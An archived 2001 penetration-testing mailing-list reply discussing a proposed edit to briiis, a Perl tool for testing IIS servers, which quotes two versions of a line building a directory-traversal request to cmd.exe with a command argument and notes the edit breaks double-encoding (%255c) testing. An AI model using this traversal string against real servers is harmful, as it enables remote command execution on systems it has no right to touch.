Penetration Testing mailing list archives

Re: iXsecurity.tool.briiis.3.02

From: Sigtrap <sigtrap () mail bip net>
Date: Wed, 13 Jun 2001 15:33:27 -0700

Nicolas Gregoire writes:

Here are the modifications I did to your toy :
OLD LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..${opt_F}winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);
NEW LINE :
$explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c"
if ($opt_c);


Have Nicolas tested his change before mailing pen-test?
If you change Ian Vitek's briiis with the NEW LINE, the double encoding vulnerability testing (%255c)
will fail due to the last '../'.

Briiis is not a toy, it is a weapon. Use it to defend yourself, not attacking. ;-)
//Sigtrap

Current thread:

iXsecurity.tool.briiis.3.02 ian . vitek (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 13)
  - Re: iXsecurity.tool.briiis.3.02 H D Moore (Jun 13)
- <Possible follow-ups>
- RE: iXsecurity.tool.briiis.3.02 Colby Rice (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Sigtrap (Jun 13)
  - Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 14)
- Re: iXsecurity.tool.briiis.3.02 Alex Butcher (Jun 15)